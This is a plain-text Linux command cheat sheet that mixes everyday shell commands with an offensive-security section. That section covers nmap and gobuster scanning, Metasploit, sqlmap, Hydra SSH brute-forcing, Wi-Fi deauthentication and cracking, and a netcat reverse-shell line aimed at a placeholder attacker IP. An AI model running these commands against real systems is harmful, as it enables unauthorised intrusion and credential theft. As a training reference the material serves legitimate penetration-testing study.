================================================================================
                        LINUX COMMANDS - SECURITY REFERENCE
================================================================================

--------------------------------------------------------------------------------
HELP & DOCUMENTATION
--------------------------------------------------------------------------------

  man <command>                  Display the full manual for a command (e.g. man hydra)
  info <command>                 Display online help information about a command
  whatis <command>               Search for complete words and find manual pages
  apropos <keyword>              Find manual pages related to a keyword
  type <command>                 Show the type and location of a command
                                 (alias, builtin, or binary)
  alias ll='ls -la'              Define an abbreviation for a long command
  unalias <name>                 Delete an abbreviation defined using alias

--------------------------------------------------------------------------------
BASIC FILE & DIRECTORY COMMANDS
--------------------------------------------------------------------------------

  pwd                            Show current directory path
  cd <directory>                 Change directory
  cd -                           Jump back to previous directory (instead of cd .. cd ..)
  cd ~                           Go to home directory
  .                              Current directory (e.g. cp /media/cdrom/* . copies files here)
  ls                             List files in a directory
  ls -l                          Long format — permissions, owner, size, date
  ls -a                          Show all files including hidden (dot files)
  ls -la                         Full details including hidden files (most common)
  ls -lh <file>                  Human-readable sizes (KB, MB, GB)
  ls -lt                         Sort by time — newest first
  ls -lS                         Sort by size — largest first
  ls -R                          Recursive — list all subdirectory contents
  ls -d */                       Show only directories
  mkdir <foldername>             Create a new folder
  mkdir dir1/dir2                Create nested directories
  mkdir -p ./bee{a,b}/{x,y}     Create multiple folder combinations at once
  touch <file>                   Create an empty file or update its timestamp
  touch file{a..10}.txt          Create multiple files at once
  cp <source> <destination>      Copy files or directories
  mv <source> <destination>      Move or rename files/directories
  rm <file>                      Delete a file
  rm -r <folder>                 Delete a folder and its contents
  rm -rf <folder>                Force delete everything inside recursively (dangerous)
  rmdir <folder>                 Delete an empty directory
  diff file1.txt file2.txt       Show differences between two files
  file <file>                    Display the type of data in a file
  hostname -I                    List all IP addresses quickly
  exec bash                      Refresh current shell session
  history 5                      Print last 5 commands
  !!                             Repeat the previous command
  !1                             Run command number 1 from history
  nohup ./program &              Keep a program running after closing the terminal
  ;                              Chain short commands (cd /tmp; ls; pwd)
  \                              Break long commands across lines (cat \ /etc/passwd)
  "text with spaces"             Use quotes for strings with spaces (grep "justin kloski")
  nano <( curl link)             quick way to download file and edit it
--------------------------------------------------------------------------------
SYMBOLIC LINKS
--------------------------------------------------------------------------------

  ln -s <target> <linkname>      Create a symbolic link

  Example:
    ln -s tmp/files/take-the-command-challenge take-the-command-challenge
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^
          TARGET (existing file, points TO this)   LINKNAME (new shortcut)

  Result: typing take-the-command-challenge opens tmp/files/take-the-command-challenge

--------------------------------------------------------------------------------
FINDING FILES & COMMANDS
--------------------------------------------------------------------------------

  find / -name "*.conf"          Find all .conf files on the system
  find / -name "pass*"           Find files starting with "pass"
  find / -perm -4000 2>/dev/null Find SUID binaries (potential privesc)
  locate <filename>              Find files using a periodically updated database
                                 (database created by updatedb)
  updatedb                       Manually update the locate database
  which <command>                Show full path of a command in your PATH
  whereis <command>              Show binary, source, and man page locations
  type <command>                 Show if command is alias, builtin, or file path
  command -v <command>           Reliable command resolution (good for scripts)
  echo $PATH                     Show directories searched when running commands

  Examples:
    which python3                /usr/bin/python3
    whereis nmap                 nmap: /usr/bin/nmap /usr/share/nmap
    type ls                      ls is /usr/bin/ls
    type ll                      ll is an alias for ls -la

COMMAND -V — Detailed command info
  ----------------------------------

  command -v <command>         Show how the shell resolves a command

  Example:
  command -v python3           /usr/bin/python3

  Works well in scripts (more reliable than which)

  ECHO $PATH — View search paths
  -------------------------------

  echo $PATH                   Show directories searched for commands

  Example output:
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  Order matters — first match is what gets executed

  PRACTICAL USE CASES
  --------------------

  which sshd                   Check if SSH server is installed
  type python                  See if python is aliased or real binary
  whereis bash                 Find bash binary and man page
  echo $PATH                   Debug why a command isn’t found

--------------------------------------------------------------------------------
VIEWING FILE CONTENT
--------------------------------------------------------------------------------

  cat <file>                     Print entire file to terminal
  less <file>                    Scroll through file (b to go back, q to quit)
  more <file>                    Display file one page at a time (forward only)
  head <file>                    Show first 10 lines (default)
  head -n 5 <file>               Show first 5 lines
  tail <file>                    Show last 10 lines (default)
  tail -n 5 <file>               Show last 5 lines
  tail -f <file>                 Follow file live — great for watching logs in real time
  nl <file>                      Number all non-blank lines and print to output
  tac <file>                     Print file in reverse (last line first)

  Examples:
    tail -f /var/log/syslog      Watch syslog live
    tail -n 50 auth.log          Check last 50 authentication attempts
    head access.log              Preview top of a log file
    dmesg | tail                 Most recent kernel messages

USING WITH PIPES
  -----------------

  cat file.txt | tail -5       Show last 5 lines of file
  grep "error" log.txt | tail  Show last matching error entries
  dmesg | tail                 Show most recent kernel messages

  PRACTICAL USE CASES
  --------------------

  tail -f access.log           Monitor web server traffic live
  tail -n 50 auth.log          Check last 50 authentication attempts
  ps aux | tail                See last processes in long output

  TIP: You usually don't need cat with head/tail:
    tail -5 file.txt             (better than: cat file.txt | tail -5)

--------------------------------------------------------------------------------
PROCESSING FILES
--------------------------------------------------------------------------------

  cut -d: -f1 <file>             Extract specific columns from lines
                                 (-d sets delimiter, -f sets field number)
  grep "pattern" <file>          Search for a pattern in a file
  grep -i "pattern" <file>       Case-insensitive search
  grep -n "pattern" <file>       Show line numbers with matches
  sort <file>                    Sort lines in a file alphabetically
  uniq <file>                    Remove duplicate consecutive lines from a file
  wc -l <file>                   Count lines in a file
  wc -w <file>                   Count words in a file
  tr 'a-z' 'A-Z' < file         Substitute characters (lowercase to uppercase)
  sed 's/old/new/g' <file>       Find and replace text in a file
  paste file1 file2              Concatenate corresponding lines from multiple files
  split -l 100 file.txt          Split file into chunks of 100 lines each
  fold -w 80 <file>              Wrap long lines to fit 80 character width
  expand <file>                  Convert all tabs to spaces
  patch file.txt changes.patch   Update a file using a diff/patch file
  dd if=<input> of=<output>      Copy blocks of data (also used to copy device data)
  strings <file>                 Extract readable strings from a binary
  diff file1.txt file2.txt       Compare two files and show differences

  Compressed file viewing:
  zcat <file.gz>                 Display a compressed file without decompressing
  zless <file.gz>                View compressed file one page at a time (b to go back)
  zmore <file.gz>                View compressed file one page at a time (forward only)

--------------------------------------------------------------------------------
REDIRECTS & PIPES
--------------------------------------------------------------------------------

  >     Output redirect — send output to a file (OVERWRITES existing content)
  >>    Append redirect — add output to the END of a file
  <     Input redirect  — feed a file into a command as input
  |     Pipe            — send output of one command directly into another

  OUTPUT REDIRECT  >
  ------------------
  echo "hello" > file.txt               Create or overwrite file.txt
  nmap -sV 192.168.1.1 > scan.txt       Save nmap output to a file
  ls -la > listing.txt                  Save directory listing to a file

  APPEND REDIRECT  >>
  --------------------
  echo "second line" >> file.txt        Add a line without overwriting
  nmap -sV 192.168.1.2 >> scan.txt      Add more results to an existing file

  INPUT REDIRECT  <
  ------------------
  john --wordlist=rockyou.txt < hashes.txt    Feed hashes file into john
  mysql -u root -p < backup.sql               Run SQL commands from a file
  wc -l < targets.txt                         Count lines in a file

  PIPE  |
  -------
  cat file.txt | grep "password"        Find lines containing "password"
  ps aux | grep apache                  Find running apache processes
  nmap -sV 192.168.1.1 | grep open      Show only open ports
  cat /etc/passwd | cut -d: -f1         Extract just the usernames
  cat passwords.txt | wc -l             Count lines in a file

  CHAINING EXAMPLES
  -----------------
  cat /etc/passwd | grep "/bin/bash" | cut -d: -f1 > shell_users.txt
  nmap -sn 192.168.1.0/24 | grep "report" | awk '{print $5}' > live_hosts.txt
  strings malware.exe | grep -i "http" > urls.txt
  cat access.log | grep "200" | awk '{print $1}' | sort | uniq -c | sort -rn

  SPECIAL REDIRECTS
  -----------------
  2>/dev/null          Suppress error messages — send errors to nowhere
  2>&1                 Redirect errors to the same place as normal output
  tee <file>           Show output in terminal AND save to file simultaneously

  find / -perm -4000 2>/dev/null                       Find SUID files, hide errors
  nmap -sV 192.168.1.0/24 2>/dev/null | tee out.txt   Scan, suppress errors, save output
  hydra -L users.txt -P rockyou.txt ssh://192.168.1.1 2>&1 | tee results.txt

--------------------------------------------------------------------------------
TEXT OUTPUT & WRITING TO FILES
--------------------------------------------------------------------------------

  echo "text" > file             Overwrite file with text
  echo "text" >> file            Append text to file
  tee <file>                     Write input to both terminal and a file
  tee -a <file>                  Append mode with tee

--------------------------------------------------------------------------------
ARCHIVING & COMPRESSING
--------------------------------------------------------------------------------

  tar -cvf archive.tar /dir      Create a tar archive
  tar -xvf archive.tar           Extract a tar archive
  tar -czvf archive.tar.gz /dir  Create a compressed tar.gz archive
  tar -xzvf archive.tar.gz       Extract a tar.gz archive
  gzip <file>                    Compress a file with GNU Zip
  gunzip <file>                  Decompress a .gz file
  compress <file>                Compress a file (older format)
  uncompress <file>              Decompress a .Z compress file
  cpio                           Copy files to and from an archive

  Example:
    sudo gunzip /usr/share/wordlists/rockyou.txt.gz    Decompress rockyou wordlist

--------------------------------------------------------------------------------
FILE PERMISSIONS — CHMOD & CHOWN
--------------------------------------------------------------------------------

  Every file has three permission groups:
    Owner    The user who owns the file
    Group    Users in the file's group
    Others   Everyone else

  Each group has three permission types:
    r = read     (value: 4)
    w = write    (value: 2)
    x = execute  (value: 1)

  Each digit = sum of r+w+x for that group:
    7 = rwx  (4+2+1)   full access
    6 = rw-  (4+2)     read and write
    5 = r-x  (4+1)     read and execute
    4 = r--  (4)       read only
    0 = ---            no access

  NUMERIC MODE
  ------------
  chmod 777 <file>               rwxrwxrwx — everyone full access (dangerous)
  chmod 755 <file>               rwxr-xr-x — owner full, others read/execute
  chmod 700 <file>               rwx------ — owner only
  chmod 644 <file>               rw-r--r-- — owner read/write, others read only
  chmod 600 <file>               rw------- — owner read/write only (good for SSH keys)
  chmod 400 <file>               r-------- — read only for owner (sensitive files)

  SYMBOLIC MODE
  -------------
  chmod +x <file>                Add execute for everyone
  chmod -x <file>                Remove execute for everyone
  chmod u+x <file>               Add execute for owner only
  chmod g+w <file>               Add write for group only
  chmod o-r <file>               Remove read from others
  chmod a+x <file>               Add execute for all
  chmod -R 755 /var/www/html     Apply permissions recursively

  CHOWN — CHANGE OWNERSHIP
  ------------------------
  chown user:group <file>        Change owner and group
  chown kali:kali .              Fix ownership of current directory
  chown -R user:group /dir       Recursively change ownership of a folder

  CHECKING PERMISSIONS
  --------------------
  ls -la <file>                  Show permissions
  stat <file>                    Detailed file info including permissions

  READING PERMISSION OUTPUT
  -------------------------
  -rwxr-xr--  1  neo  neo  4096  Feb 26  file.sh
   ^           File type (- = file, d = directory, l = symlink)
    ^^^        Owner permissions (read, write, execute)
       ^^^     Group permissions (read, no write, execute)
          ^^^  Others permissions (read only)

--------------------------------------------------------------------------------
WILDCARDS — PATTERN MATCHING
--------------------------------------------------------------------------------

  *   ASTERISK — Match anything (zero or more characters)
  -------------------------------------------------------
  ls *.txt                    List all .txt files
  ls scan*                    List files starting with "scan"
  rm *.log                    Delete all .log files
  cp *.py /backup/            Copy all Python scripts to /backup/

  ?   QUESTION MARK — Match exactly one character
  ------------------------------------------------
  ls file?.txt                Matches file1.txt, file2.txt — NOT file10.txt
  rm log?.txt                 Deletes log1.txt, log2.txt etc

  []  BRACKETS — Match one character from a set
  ----------------------------------------------
  ls file[123].txt            Matches file1.txt, file2.txt, file3.txt only
  ls scan[0-9].txt            Matches scan0.txt through scan9.txt
  ls [A-Z]*.txt               Files starting with uppercase letter
  ls [!a]*.txt                NOT starting with a

  {}  CURLY BRACES — Brace expansion
  ------------------------------------
  cp file.{txt,py,sh} /backup/        Copy multiple extensions at once
  touch scan_{1,2,3}.txt              Create scan_1.txt, scan_2.txt, scan_3.txt
  ls *.{jpg,png,gif}                  List all image files

  COMBINING WILDCARDS
  -------------------
  ls *.???                    All files with a 3-character extension
  find / -name "*.conf"       Find all .conf files on the system
  grep "error" *.log          Search for "error" across all log files

  WARNING: Run ls with wildcard first before using rm to preview matches.
    ls *.log      (verify first)
    rm *.log      (then delete)

--------------------------------------------------------------------------------
DISK & STORAGE
--------------------------------------------------------------------------------

  df                             Show disk space on all mounted filesystems
  df -h                          Human-readable disk space (GB/MB) !!!
  du -h                          Show directory/file sizes in human-readable form
  du -sh /dir                    Total size of a specific directory
  fdisk -l                       List all partitions on all drives
  fdisk /dev/sda                 Partition a hard drive
  mkfs.ext4 /dev/sdb1            Create a new ext4 filesystem
  fsck /dev/sda1                 Check and repair a filesystem
  mount /dev/sdb1 /mnt           Mount a device to a directory
  umount /mnt                    Unmount a device
  mkswap /dev/sdb2               Create a swap partition
  swapon /dev/sdb2               Activate swap space
  swapoff /dev/sdb2              Deactivate swap space
  sync                           Write buffered data to disk
  tty                            Display the device name for the current terminal
  mknod                          Create a device file
  fdformat                       Format a floppy disk (legacy)
  lsblk -f                       See mounted drives
--------------------------------------------------------------------------------
SYSTEM INFORMATION & PROCESS MANAGEMENT
--------------------------------------------------------------------------------

  uname -a                       Full system and kernel information
  uptime                         How long the system has been running
  whoami                         Current logged-in user
  id <username>                  Display user and group ID for a user
  ps aux                         Show all running processes
  pstree                         Show parent-child process relationships
  top                            Real-time process viewer
  htop                           Interactive process viewer (more user-friendly)
  free -h                        Show free and used memory in human-readable form
  kill <PID>                     Kill a process by its PID
  pkill <name>                   Kill a process by name
  nice <command>                 Run a process with lower priority (nice mode)
  bg                             Run an interrupted process in the background
  fg                             Bring a background process to the foreground
  ldd <program>                  Display shared libraries needed to run a program
  printenv                       Display current environment variables
  reboot                         Restart the computer
  shutdown -h now                Shut down Linux immediately
  halt                           Shut down and halt the computer

--------------------------------------------------------------------------------
DATES & TIMES
--------------------------------------------------------------------------------

  date                           Display the current date and time
  date -s "2026-01-01 12:00"     Set a new date and time
  cal                            Display a calendar for the current month
  cal 2026                       Display a calendar for the full year
  cal 6 2026                     Display calendar for June 2026

--------------------------------------------------------------------------------
PRINTING
--------------------------------------------------------------------------------

  lpr <file>                     Print a file to the default printer

--------------------------------------------------------------------------------
MANAGING USERS
--------------------------------------------------------------------------------

  whoami                         Show current user
  id <username>                  Show user and group IDs
  groups <username>              List groups a user belongs to
  passwd                         Change your password
  passwd <username>              Change another user's password (root only)
  su <username>                  Switch to another user
  su                             Switch to root (no argument = root)
  chsh -s $(which zsh)           Change default shell to Zsh permanently
  chsh -s $(which bash)          Change default shell to Bash

--------------------------------------------------------------------------------
NETWORKING COMMANDS
--------------------------------------------------------------------------------

  ifconfig                       Show network interfaces and IP addresses
  ip a                           Show IP addresses (modern alternative to ifconfig)
  hostname -I                    Display all IPs quickly
  ping <IP>                      Test connectivity to a host
  netstat -tulnp                 Show open ports and listening services
  traceroute <IP>                Trace the route packets take to a host
  nslookup <domain>              Basic DNS lookup for a domain
  dig <domain>                   Detailed DNS information
  whois <domain>                 Fetch domain registration details

--------------------------------------------------------------------------------
SCANNING & ENUMERATION
--------------------------------------------------------------------------------

  NMAP FLAGS
  ----------
  -sn                    Ping sweep — find live hosts, no port scan
  -sT                    TCP Connect Scan (full handshake, louder)
  -sS                    SYN Scan (stealth, half-open)
  -sU                    UDP Scan (slower than TCP)
  -sV                    Version detection — identify software on open ports
  -O                     OS detection
  -A                     Aggressive — OS, version, scripts, traceroute
  -p <port>              Scan specific port or range (e.g. -p 80 or -p 1-1000)
  -p-                    Scan ALL 65535 ports
  --open                 Only show open ports
  -oN <file>             Save output in readable format
  -oG <file>             Save output in greppable format
  -T4                    Speed template (T1=slowest, T5=fastest)
  -v / -vv               Verbose / very verbose output
  --script <name>        Run a specific NSE script

  NMAP EXAMPLES
  -------------
  nmap -sn 192.168.1.0/24               Ping sweep — discover live hosts
  nmap -sS <IP>                         Stealth SYN scan
  nmap -A <IP>                          Aggressive scan
  nmap -sV 192.168.1.1 | grep open      Show only open ports

  WEB ENUMERATION
  ---------------
  nikto -h <IP>                         Web vulnerability scanner
  whatweb <URL>                         Identify web technologies and CMS
  gobuster dir -u <URL> -w <wordlist>   Directory and file brute-forcing

  GOBUSTER FLAGS
  --------------
  dir                    Directory/file brute-force mode
  -u <URL>               Target URL
  -w <wordlist>          Wordlist to use
  -t <number>            Threads (default 10)
  -x <extensions>        File extensions to look for (e.g. -x php,html,txt)
  -o <file>              Save output to a file
  -q                     Quiet — only show results

--------------------------------------------------------------------------------
EXPLOITATION & ATTACKING
--------------------------------------------------------------------------------

  METASPLOIT
  ----------
  msfconsole                     Start the Metasploit Framework
  search exploit <keyword>       Search for exploits by keyword
  use <exploit>                  Select an exploit module
  set LHOST <IP>                 Set local (attacker) IP
  set LPORT <port>               Set listening port
  exploit                        Run the selected exploit

  WEB ATTACKS
  -----------
  sqlmap -u <URL> --dbs          Automated SQL injection — enumerate databases

  BRUTE FORCE (HYDRA)
  -------------------
  HYDRA FLAGS
  -----------
  -l <username>          Single known username
  -L <file>              List of usernames from a file
  -p <password>          Single known password
  -P <file>              Wordlist of passwords
  -t <number>            Parallel threads (e.g. -t 4)
  -f                     Stop after first valid login found
  -v / -V                Verbose / very verbose (shows every attempt)
  -s <port>              Custom port if not default
  -o <file>              Save found credentials to a file

  HYDRA EXAMPLES
  --------------
  hydra -l <user> -P <wordlist> <IP> ssh               Basic SSH brute force
  hydra -l admin -P passlist.txt ssh://192.168.1.11 -t 4 -f    Known user
  hydra -L users.txt -P passlist.txt ssh://192.168.1.11 -t 4 -f    Unknown user

  NETCAT
  ------
  nc -lvnp <port>                          Listen for incoming connection
  nc <attacker_IP> <port> -e /bin/bash     Reverse shell back to attacker

  NETCAT FLAGS
  ------------
  -l                     Listen mode
  -v                     Verbose
  -n                     No DNS resolution — use IPs only
  -p <port>              Specify port
  -e <program>           Execute program on connect (e.g. -e /bin/bash)
  -u                     UDP mode

--------------------------------------------------------------------------------
WIRELESS ATTACKS
--------------------------------------------------------------------------------

  airmon-ng start wlan0                              Enable monitor mode
  airodump-ng wlan0mon                               Capture wireless packets
  aireplay-ng -0 5 -a <BSSID> wlan0mon              Deauthenticate clients (5 packets)
  aircrack-ng -w <wordlist> -b <BSSID> <capfile>    Crack captured Wi-Fi handshake

--------------------------------------------------------------------------------
PRIVILEGE ESCALATION & POST-EXPLOITATION
--------------------------------------------------------------------------------

  sudo -l                                            Check current sudo privileges
  find / -perm -4000 2>/dev/null                     Find SUID binaries
  python -c 'import pty; pty.spawn("/bin/bash")'     Spawn a TTY shell

--------------------------------------------------------------------------------
PASSWORD CRACKING
--------------------------------------------------------------------------------

  john --wordlist=<wordlist> <hashfile>              Crack hashes with John the Ripper
  hashcat -m 0 -a 0 <hashfile> <wordlist>           Crack hashes with Hashcat (MD5 mode)
  hash-identifier                                    Identify hash type
  cewl -w <wordlist> -d 2 <URL>                     Generate wordlist from website
  crunch 8 8 abc123 -o wordlist.txt                 Generate custom wordlist (8 char)

--------------------------------------------------------------------------------
WIRESHARK & PACKET ANALYSIS
--------------------------------------------------------------------------------

  wireshark &                    Launch Wireshark GUI in background
  tshark -i wlan0                Capture packets via terminal
  tcpdump -i eth0                Capture all traffic on eth0
  tcpdump -A -s0 port 80         Capture and display HTTP traffic in ASCII

--------------------------------------------------------------------------------
FORENSICS & STEGANOGRAPHY
--------------------------------------------------------------------------------

  binwalk -e <file>              Extract hidden/embedded data from a file
  strings <file>                 Extract human-readable strings from a binary
  steghide extract -sf <file>    Extract hidden data from an image
  foremost -i <file> -o <dir>    Recover deleted/hidden files
  autopsy                        Launch Autopsy — GUI digital forensics platform

--------------------------------------------------------------------------------
HTML FILES & WEB BROWSING FROM TERMINAL
--------------------------------------------------------------------------------

  OPENING HTML FILES IN A BROWSER
  --------------------------------
  firefox file.html              Open a local HTML file in Firefox
  chromium file.html             Open in Chromium
  xdg-open file.html             Open with system default browser

  VIEWING RAW HTML IN TERMINAL
  ----------------------------
  cat file.html                  Print entire HTML file
  nano file.html                 Edit in nano
  vim file.html                  Edit in vim
  less file.html                 Scroll through file

  RUNNING A LOCAL WEB SERVER
  --------------------------
  python3 -m http.server 8080    Serve current directory over HTTP on port 8080
                                 Then visit: localhost:8080

  TERMINAL-ONLY BROWSERS (NO GUI)
  --------------------------------
  lynx https://google.com        Text-based browser
  w3m https://google.com         Lightweight with mouse support
  elinks https://google.com      Feature-rich with color support

  Install if not present:
    sudo apt install lynx w3m elinks

  FETCHING & DOWNLOADING
  ----------------------
  curl https://google.com        Fetch and dump raw HTML to terminal
  wget https://google.com        Download a file or webpage to disk
  firefox https://google.com     Open URL in Firefox

--------------------------------------------------------------------------------
TERMINAL SHORTCUTS — KEYBOARD NAVIGATION
--------------------------------------------------------------------------------

  CURSOR MOVEMENT
  ---------------
  Ctrl + A        Jump to START of the line
  Ctrl + E        Jump to END of the line
  Alt  + B        Jump back ONE WORD
  Alt  + F        Jump forward ONE WORD
  Left / Right    Move one character at a time
  Up / Down       Cycle through command history

  DELETING
  --------
  Ctrl + U        Delete from cursor to START of line
  Ctrl + K        Delete from cursor to END of line
  Ctrl + W        Delete ONE WORD backward
  Alt  + D        Delete ONE WORD forward
  Backspace       Delete one character back

  PASTE WHAT YOU JUST DELETED
  ---------------------------
  Ctrl + Y        "Yank" — paste the last thing you cut with Ctrl+U/K/W

  SEARCH & REUSE OLD COMMANDS
  ---------------------------
  Ctrl + R        Search backward through command history interactively
                  (type to search, Ctrl+R again for next match, Enter to run)
  !!              Re-run the last command
  !<text>         Re-run last command starting with <text>
                  Example: !ssh  runs the last command that started with ssh

  SCREEN & PROCESS CONTROL
  ------------------------
  Ctrl + L        Clear the screen (same as typing "clear")
  Ctrl + C        Kill/interrupt the running command
  Ctrl + Z        Suspend the running command
                  (use "fg" to resume in foreground, "bg" for background)
  Ctrl + D        Exit the current shell (same as "exit")
  Tab             Auto-complete file/folder/command names
  Tab Tab         Show ALL possible completions

--------------------------------------------------------------------------------
ZSH & OH MY ZSH
--------------------------------------------------------------------------------

  WHAT ZSH IS
  -----------
  ZSH is a shell — the program that runs in your terminal and interprets
  your commands. More powerful than the default bash with better
  autocomplete, globbing, and customization.

  Install Oh My Zsh:
    sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"

  Set ZSH as default shell:
    chsh -s $(which zsh)

  Config file location:
    ~/.zshrc

  Apply changes after editing:
    source ~/.zshrc

  USEFUL COMMANDS
  ---------------
  echo $SHELL                    Check what shell you are using
  zsh --version                  Check ZSH version
  nano ~/.zshrc                  Open config for editing
  cp ~/.zshrc ~/Desktop/zshrc_backup    Back up config before editing
  ls ~/.oh-my-zsh/themes/        See available Oh My Zsh themes

  PLUGINS
  -------
  Add plugins to ~/.zshrc:
    plugins=(git zsh-autosuggestions zsh-syntax-highlighting)

  Install zsh-autosuggestions (shows history suggestions as you type):
    git clone https://github.com/zsh-users/zsh-autosuggestions \
    ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions

  Install zsh-syntax-highlighting (colors commands green/red as you type):
    git clone https://github.com/zsh-users/zsh-syntax-highlighting \
    ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting

  POWERLEVEL10K THEME
  -------------------
  Most popular Oh My Zsh theme — shows git status, icons, path, time.

  Install:
    git clone --depth=1 https://github.com/romkatv/powerlevel10k.git \
    ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/themes/powerlevel10k

  Set in ~/.zshrc:
    ZSH_THEME="powerlevel10k/powerlevel10k"

  Then: source ~/.zshrc  (setup wizard launches automatically)

  ALIASES — SHORTCUT COMMANDS
  ---------------------------
  An alias makes the shell run one command when you type another.
  You type "ls" → shell actually runs "lsd" (with icons).

  Define in ~/.zshrc:
    alias ls='lsd'
    alias ll='lsd -la'
    alias lt='lsd --tree'

  View all active aliases:
    alias

  Remove an alias for the current session:
    unalias ls

  NOTE: Always reload with source ~/.zshrc after editing — not
  source ~/.bashrc (that is bash only and won't apply zsh settings).

--------------------------------------------------------------------------------
LSD — LS WITH ICONS
--------------------------------------------------------------------------------

  lsd (LSDeluxe) is a drop-in ls replacement that adds file/folder
  icons next to every entry. Requires a Nerd Font installed in
  your terminal or icons show as boxes.

  Install:
    sudo dnf install lsd           (Fedora)
    sudo apt install lsd           (Debian/Kali)

  COMMANDS
  --------
  lsd                            List files with icons (replaces ls)
  lsd -la                        Long format, all files, with icons
  lsd --tree                     Tree view with icons
  lsd -lh                        Human-readable sizes with icons
  lsd -lt                        Sort by time, newest first
  lsd --group-dirs first         Show directories before files

  ALIAS IT TO REPLACE ls
  ----------------------
  Add to ~/.zshrc:
    alias ls='lsd'
    alias ll='lsd -la'
    alias lt='lsd --tree'

  Then reload:
    source ~/.zshrc

  NERD FONT REQUIRED
  ------------------
  Without a Nerd Font, icons render as boxes or question marks.

  Install JetBrains Mono Nerd Font:
    1. Download JetBrainsMono.zip from https://www.nerdfonts.com/font-downloads
    2. Extract and move font files:
         mkdir -p ~/.local/share/fonts/JetBrainsMono
         mv ~/Downloads/*.ttf ~/.local/share/fonts/JetBrainsMono/
    3. Rebuild font cache:
         fc-cache -fv
    4. Verify installed:
         fc-list | grep JetBrains
    5. Set font in your terminal to: JetBrainsMono Nerd Font Mono

  fc-cache -fv explained:
    fc-cache   = fontconfig cache tool — tells Linux about new fonts
    -f         = force rescan everything even if unchanged
    -v         = verbose — show output while running

--------------------------------------------------------------------------------
FZF — FUZZY FINDER
--------------------------------------------------------------------------------

  fzf is a command-line fuzzy finder. It lets you interactively search
  through any list — command history, files, directories, processes —
  by typing partial matches. The most useful upgrade to your terminal
  workflow after ZSH.

  Install:
    sudo dnf install fzf           (Fedora)
    sudo apt install fzf           (Debian/Kali)

  Enable ZSH integration — add to ~/.zshrc:
    source <(fzf --zsh)

  Then reload:
    source ~/.zshrc

  HISTORY SEARCH — CTRL + R (UPGRADED)
  -------------------------------------
  After enabling fzf, Ctrl+R is replaced with fzf's fuzzy history search.

  Before fzf:
    Ctrl+R cycles through history one by one — hard to find old commands

  After fzf:
    Ctrl+R opens an interactive search panel
    Type any part of a command → fzf filters matches in real time
    Arrow keys to select, Enter to run it

  Example:
    Press Ctrl+R
    Type: nmap 192         → shows all nmap commands with that IP
    Type: docker ps        → shows all docker ps commands you've run
    Select with arrows → Enter to run

  FILE SEARCH — CTRL + T
  ----------------------
  Ctrl+T opens fzf to search files in the current directory.
  Select a file → it gets inserted into your current command line.

  Example:
    nano [Ctrl+T]          → fuzzy search for a file → inserts path → nano opens it

  DIRECTORY JUMP — ALT + C
  ------------------------
  Alt+C opens fzf to search directories and cd into them instantly.

  STANDALONE USAGE
  ----------------
  fzf                            Open fzf on its own — search stdin
  ls | fzf                       Fuzzy search through ls output
  cat file.txt | fzf             Fuzzy search through any file
  ps aux | fzf                   Fuzzy search running processes
  history | fzf                  Fuzzy search command history manually

  USEFUL COMBOS
  -------------
  kill -9 $(ps aux | fzf | awk '{print $2}')
                                 Fuzzy pick a process and kill it

  cat /etc/passwd | fzf          Fuzzy search through users

  vim $(fzf)                     Fuzzy find a file and open in vim

  SUMMARY — WHY USE FZF
  ----------------------
  Without fzf: Ctrl+R cycles history slowly, finding old commands is painful
  With fzf:    Ctrl+R opens instant fuzzy search — find any command in seconds
               Works on history, files, directories, and any piped input

--------------------------------------------------------------------------------
MISCELLANEOUS / USEFUL
--------------------------------------------------------------------------------

  tor                            Start the Tor service for anonymised routing
  proxychains nmap -sT <IP>      Route any command through proxychains
  gedit <file>                   Open file in graphical text editor
  chsh -s $(which zsh)           Set Zsh as default shell permanently
  lpr <file>                     Print a file

================================================================================

example > >(less) 2> >(tee errors.txt)    (example is a bash to give errors)

tar cf - directory | tee >(ssh neo tar xf -) >(ssh 10.0.0.124 tar xf-) > /dev/null
